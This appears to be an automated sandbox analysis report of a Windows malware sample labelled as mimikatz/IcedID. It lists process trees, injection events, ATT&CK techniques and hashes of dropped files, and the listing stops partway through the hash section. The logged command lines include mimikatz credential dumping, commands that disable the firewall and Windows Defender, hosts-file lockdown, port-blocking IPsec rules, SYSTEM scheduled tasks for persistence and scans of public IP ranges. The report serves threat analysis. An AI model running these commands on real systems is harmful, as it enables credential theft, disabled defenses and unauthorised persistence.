1836 | simzbkl.exe
1180 | xohudmc.exe
2776 | nslfoo.exe
2016 | simzbkl.exe
2016 | simzbkl.exe
5508 | simzbkl.exe
5508 | simzbkl.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process | times reported
PID 456 wrote to memory of 3560 | 456 | 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe | cmd.exe | 3
PID 3560 wrote to memory of 3064 | 3560 | cmd.exe | PING.EXE | 3
PID 3560 wrote to memory of 5100 | 3560 | cmd.exe | simzbkl.exe | 3
PID 1836 wrote to memory of 5012 | 1836 | simzbkl.exe | cmd.exe | 3
PID 5012 wrote to memory of 4880 | 5012 | cmd.exe | cmd.exe | 3
PID 5012 wrote to memory of 3760 | 5012 | cmd.exe | cacls.exe | 3
PID 5012 wrote to memory of 3976 | 5012 | cmd.exe | cmd.exe | 3
PID 5012 wrote to memory of 4868 | 5012 | cmd.exe | cacls.exe | 3
PID 5012 wrote to memory of 1636 | 5012 | cmd.exe | cmd.exe | 3
PID 5012 wrote to memory of 5076 | 5012 | cmd.exe | cacls.exe | 3
PID 1836 wrote to memory of 4744 | 1836 | simzbkl.exe | netsh.exe | 3
PID 1836 wrote to memory of 2016 | 1836 | simzbkl.exe | netsh.exe | 3
PID 1836 wrote to memory of 2376 | 1836 | simzbkl.exe | netsh.exe | 3
PID 1836 wrote to memory of 804 | 1836 | simzbkl.exe | cmd.exe | 3
PID 804 wrote to memory of 4304 | 804 | cmd.exe | wpcap.exe | 3
PID 4304 wrote to memory of 1092 | 4304 | wpcap.exe | net.exe | 3
PID 1092 wrote to memory of 808 | 1092 | net.exe | net1.exe | 3
PID 4304 wrote to memory of 1960 | 4304 | wpcap.exe | net.exe | 3
PID 1960 wrote to memory of 3200 | 1960 | net.exe | net1.exe | 3
PID 4304 wrote to memory of 628 | 4304 | wpcap.exe | net.exe | 3
PID 628 wrote to memory of 1844 | 628 | net.exe | net1.exe | 3
PID 4304 wrote to memory of 3944 | 4304 | wpcap.exe | net.exe | 1
Processes
(format: [tree depth] image path => command line)
-
[1] C:\Windows\System32\spoolsv.exe => C:\Windows\System32\spoolsv.exe
-
[2] C:\Windows\TEMP\bvzeemvvy\gzbahn.exe => "C:\Windows\TEMP\bvzeemvvy\gzbahn.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
[1] C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe => "C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe"
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tbzbbivf\simzbkl.exe
- Suspicious use of WriteProcessMemory
-
[3] C:\Windows\SysWOW64\PING.EXE => ping 127.0.0.1 -n 5
- Runs ping.exe
-
[3] C:\Windows\tbzbbivf\simzbkl.exe => C:\Windows\tbzbbivf\simzbkl.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
[1] C:\Windows\tbzbbivf\simzbkl.exe => C:\Windows\tbzbbivf\simzbkl.exe
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
- Suspicious use of WriteProcessMemory
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D users
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static del all
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add policy name=Bastards description=FuckingBastards
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filteraction name=BastardsList action=block
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S
- Suspicious use of WriteProcessMemory
-
[3] C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe => C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
[4] C:\Windows\SysWOW64\net.exe => net stop "Boundary Meter"
- Suspicious use of WriteProcessMemory
-
[5] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop "Boundary Meter"
-
[4] C:\Windows\SysWOW64\net.exe => net stop "TrueSight Meter"
- Suspicious use of WriteProcessMemory
-
[5] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop "TrueSight Meter"
-
[4] C:\Windows\SysWOW64\net.exe => net stop npf
- Suspicious use of WriteProcessMemory
-
[5] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop npf
-
[4] C:\Windows\SysWOW64\net.exe => net start npf
-
[5] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 start npf
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net start npf
-
[3] C:\Windows\SysWOW64\net.exe => net start npf
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 start npf
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net start npf
-
[3] C:\Windows\SysWOW64\net.exe => net start npf
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 start npf
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt
-
[3] C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe => C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt
- Executes dropped EXE
- Loads dropped DLL
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c C:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gtuqsjqjh\Corporate\log.txt
- Drops file in Windows directory
-
[3] C:\Windows\gtuqsjqjh\Corporate\vfshost.exe => C:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\schtasks.exe => schtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"
- Creates scheduled task(s)
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\schtasks.exe => schtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"
- Creates scheduled task(s)
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\schtasks.exe => schtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"
- Creates scheduled task(s)
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static set policy name=Bastards assign=y
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static set policy name=Bastards assign=y
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
-
[2] C:\Windows\SysWOW64\netsh.exe => netsh ipsec static set policy name=Bastards assign=y
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net stop SharedAccess
-
[3] C:\Windows\SysWOW64\net.exe => net stop SharedAccess
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop SharedAccess
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c netsh firewall set opmode mode=disable
-
[3] C:\Windows\SysWOW64\netsh.exe => netsh firewall set opmode mode=disable
- Modifies Windows Firewall
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c netsh Advfirewall set allprofiles state off
-
[3] C:\Windows\SysWOW64\netsh.exe => netsh Advfirewall set allprofiles state off
- Modifies Windows Firewall
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net stop MpsSvc
-
[3] C:\Windows\SysWOW64\net.exe => net stop MpsSvc
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop MpsSvc
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net stop WinDefend
-
[3] C:\Windows\SysWOW64\net.exe => net stop WinDefend
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop WinDefend
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c net stop wuauserv
-
[3] C:\Windows\SysWOW64\net.exe => net stop wuauserv
-
[4] C:\Windows\SysWOW64\net1.exe => C:\Windows\system32\net1 stop wuauserv
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c sc config MpsSvc start= disabled
-
[3] C:\Windows\SysWOW64\sc.exe => sc config MpsSvc start= disabled
- Launches sc.exe
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c sc config SharedAccess start= disabled
-
[3] C:\Windows\SysWOW64\sc.exe => sc config SharedAccess start= disabled
- Launches sc.exe
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c sc config WinDefend start= disabled
-
[3] C:\Windows\SysWOW64\sc.exe => sc config WinDefend start= disabled
- Launches sc.exe
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c sc config wuauserv start= disabled
-
[3] C:\Windows\SysWOW64\sc.exe => sc config wuauserv start= disabled
- Launches sc.exe
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 780 C:\Windows\TEMP\gtuqsjqjh\780.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\xohudmc.exe => C:\Windows\TEMP\xohudmc.exe
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 384 C:\Windows\TEMP\gtuqsjqjh\384.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2096 C:\Windows\TEMP\gtuqsjqjh\2096.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2744 C:\Windows\TEMP\gtuqsjqjh\2744.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2756 C:\Windows\TEMP\gtuqsjqjh\2756.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3068 C:\Windows\TEMP\gtuqsjqjh\3068.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2536 C:\Windows\TEMP\gtuqsjqjh\2536.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3892 C:\Windows\TEMP\gtuqsjqjh\3892.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3108 C:\Windows\TEMP\gtuqsjqjh\3108.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2708 C:\Windows\TEMP\gtuqsjqjh\2708.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3952 C:\Windows\TEMP\gtuqsjqjh\3952.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4476 C:\Windows\TEMP\gtuqsjqjh\4476.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2208 C:\Windows\TEMP\gtuqsjqjh\2208.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4932 C:\Windows\TEMP\gtuqsjqjh\4932.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 1560 C:\Windows\TEMP\gtuqsjqjh\1560.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 1924 C:\Windows\TEMP\gtuqsjqjh\1924.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 880 C:\Windows\TEMP\gtuqsjqjh\880.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe => C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4744 C:\Windows\TEMP\gtuqsjqjh\4744.dmp
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd.exe /c C:\Windows\gtuqsjqjh\bnafefjyn\scan.bat
-
[3] C:\Windows\gtuqsjqjh\bnafefjyn\bvbvfuizb.exe => bvbvfuizb.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
- Executes dropped EXE
- Drops file in Windows directory
-
[2] C:\Windows\SysWOW64\cmd.exe => cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D users
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
-
[3] C:\Windows\SysWOW64\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[3] C:\Windows\SysWOW64\cacls.exe => cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
-
[1] C:\Windows\SysWOW64\nslfoo.exe => C:\Windows\SysWOW64\nslfoo.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F
-
[2] C:\Windows\system32\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[2] C:\Windows\system32\cacls.exe => cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F
-
[2] C:\Windows\system32\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[2] C:\Windows\system32\cacls.exe => cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c C:\Windows\ime\simzbkl.exe
-
[2] C:\Windows\ime\simzbkl.exe => C:\Windows\ime\simzbkl.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F
-
[2] C:\Windows\system32\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[2] C:\Windows\system32\cacls.exe => cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F
-
[2] C:\Windows\system32\cmd.exe => C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[2] C:\Windows\system32\cacls.exe => cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F
-
[1] C:\Windows\system32\cmd.EXE => C:\Windows\system32\cmd.EXE /c C:\Windows\ime\simzbkl.exe
-
[2] C:\Windows\ime\simzbkl.exe => C:\Windows\ime\simzbkl.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process 1
Windows Service 1
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Scheduled Task/Job 1
Privilege Escalation
Create or Modify System Process 1
Windows Service 1
Boot or Logon Autostart Execution 1
Registry Run Keys / Startup Folder 1
Scheduled Task/Job 1
Defense Evasion
Impair Defenses 1
Disable or Modify System Firewall 1
Modify Registry 1
Downloads
-
C:\Windows\SysWOW64\Packet.dll
Filesize 95KB
MD5 86316be34481c1ed5b792169312673fd
SHA1 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
C:\Windows\SysWOW64\wpcap.dll
Filesize 275KB
MD5 4633b298d57014627831ccac89a2c50b
SHA1 e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256 b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
C:\Windows\TEMP\bvzeemvvy\config.json
Filesize 693B
MD5 f2d396833af4aea7b9afde89593ca56e
SHA1 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256 d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
C:\Windows\TEMP\gtuqsjqjh\2096.dmp
Filesize 4.2MB
MD5 43e6520151450ad926debf9525ee2610
SHA1 c55f2ae511f1499c11a5158964845a216fb5b30b
SHA256 d2db1f82e9c29b9f27806f14b2d7d17f9c78db008c543750f4413980389c9582
SHA512 90c31ed5d2c3a7b8194d52fea178be2ae1477449ebfc17ecc557e8929eb644e699932eccbc37f0befa41dac5f8405a07d7f45cd2eda7430e1c6b0630f9158451
-
C:\Windows\TEMP\gtuqsjqjh\2208.dmp
Filesize 25.9MB
MD5 fb0c81e05b80d8740eb358f52765f2f6
SHA1 53a1637d9e0e0101438b7026325f611c3365f852
SHA256 3b18b19a84379fd864c22c91f8795ad10341f0e4f34be0e754b696670e1f9002
SHA512 432e82c3bd39f880c1be1d70af7b5a004594dbfd795a8782c7f5ee2a96d2b001a85f26736f3bf94e40d1097c0bcd70f0b3bb17c74b0fcf35c0df2f344e4490ec
-
C:\Windows\TEMP\gtuqsjqjh\2536.dmp
Filesize 814KB
MD5 f8888812959d764f12b5741de7f5c166
SHA1 1fab4d28c0574119e7a0c1acc6c93213aab15b07
SHA256 584444b2c6c6d5e75ba3e669eb9fc15c264d631bdc6356eadbd9e7eb6b1eb760
SHA512 3eeacbd89741527e91934ae09d41a2806f05a1694b9bdae23e9a36fd6969ba7d2ad27d59dba740818a7e91ad971c410638adb6ec1e8340ee5e5daa257c9a73a8
-
C:\Windows\TEMP\gtuqsjqjh\2708.dmp
Filesize 6.8MB
MD5 443ea203268413794715083ed05fde51
SHA1 17c96e10bb1e1f518686c78501f0cb709fe6bb71
SHA256 0adf470c6c4d1165b26895cb49047793034913c4a54eef895d3e0b6a47e3dc47
SHA512 8a13d0f52b6b65c3f6c1522549fe9e36662f6c610799b09c24d87ac19aa7b987d8c3738cd57479bce3eaf3ab1696d61afc479b9c4c25cb7fc3e4763851bc9a48
-
C:\Windows\TEMP\gtuqsjqjh\2744.dmp
Filesize 7.5MB
MD5 84469c658f5a79ab7106d4592b5957c2
SHA1 4fb4c4fa780e9d9489c3063623a6d01d12c6d2a3
SHA256 791985170983305a6c6f63152f9f61afa516ff7bead77634b635b770334491a4
SHA512 b32fe4b1de95f54ad865ef3c9dc04468d6a927d9310cc3cb1e1c530a207d3151ae57dffd8cdf145258701c7c4098e86cba0ec88592952e4fed2c6dcfa442e522
-
C:\Windows\TEMP\gtuqsjqjh\2756.dmp
Filesize 3.9MB
MD5 9ad25f749a13d7d99836eea6b99cb46a
SHA1 df2775e9eafef9e4edffad28f269488a37820feb
SHA256 4d88102f1c76b52b69154abf9d871bc180db35ac1e08bf86543a66232c8e6bd6
SHA512 3c156527c581a5632aaec70e4d19824f1db0f8f8c2d56c665c93239a0b2d064df946e552af9c2a64d1772d7df482316f87300aed56d7876026dd85e8d045ad68
-
C:\Windows\TEMP\gtuqsjqjh\3068.dmp
Filesize 3.0MB
MD5 ecc9e4c78936d3071e8d5c82bbc2cc2f
SHA1 790fcff83d87357cabd840655a5ef340b34e22fe
SHA256 5dc4580ab32bb8518cc472c3ae813f42d4c8fe9fefe8f2937542e5a3b66f5975
SHA512 3eb0c056cc65ffaaa1353f5ef5a3bc461efc475b74a68fd0e0d3c9a7e48b32a3db8b76572d3d8d9733860018ad6db3181e88fec25a898dcc1d58335b53d0cc18
-
C:\Windows\TEMP\gtuqsjqjh\3108.dmp
Filesize 20.6MB
MD5 48ff6d9bc9c8b5597b46e6ea0679fe99
SHA1 c7be8beb9b3566f1af519f4a608adea22b45e8e3
SHA256 a5bc37493a7112d74c5389cc93c46f702c8dec9b87a57cb6966c5c42aeb483b5
SHA512 5f062b1b973985fa069f63736af3a59367d1f02fc6d198bffd62c9224deeab99277f640dc2088df6dfbd884f90d6fc716403d5edc6fa233a550409684fe7d7a9
-
C:\Windows\TEMP\gtuqsjqjh\384.dmp
Filesize 33.7MB
MD5 92333e7ce309dc5372866442ebd1ddfb
SHA1 ad902eb9ca1264d37fbd24556da55e4bff78ab94
SHA256 dd9ada2687f27a179ad8ec2e89550ee2ab7f8cd0b7aa6d437937947e3127e439
SHA512 4b197840e7ce153ddf7786109cadf5f7fab2b97c091633a8de44a384bdf6b2c404929d8d151d32dc52485e314adaaf527655b0ddadcaabb610ced6bf06363913
-
C:\Windows\TEMP\gtuqsjqjh\3892.dmp
Filesize 2.5MB
MD5 226ec9ed293b2f378fc0ad439a60654c
SHA1 b30bd5c4200485b528462a19d260a429f79b9033
SHA256 cdd8906928012241270fa8898b8424f31e1f7485e6df715b8c6b3767926190f8
SHA512 4099d150648cfae5c97965df04a85839d01644a3e59f4c06ddbeb60a583e2178722a633b28ec7043b0f82f8e5faa0e883bdf6f75840ad246d24de24b0026eee3
-
C:\Windows\TEMP\gtuqsjqjh\3952.dmp
Filesize 45.4MB
MD5 f56e8cff3c79777bc0b20945a42d5ce9
SHA1 1ef991ca932a1c17cdd73982c655593a1ccb8a75
SHA256 07fda85a55315f3307f19b678e2f7f8c0f9e892ee83256b9dfbf43c7c13722f6
SHA512 41d9445c730693ac63046f3d3c718ab25cfde130c95f5e9c30bc56be5226d51361532d8fa1c74f81896a4771289033e78dc78d38a9a309248e4f6627e6664e36
-
C:\Windows\TEMP\gtuqsjqjh\4476.dmp
Filesize 1.1MB
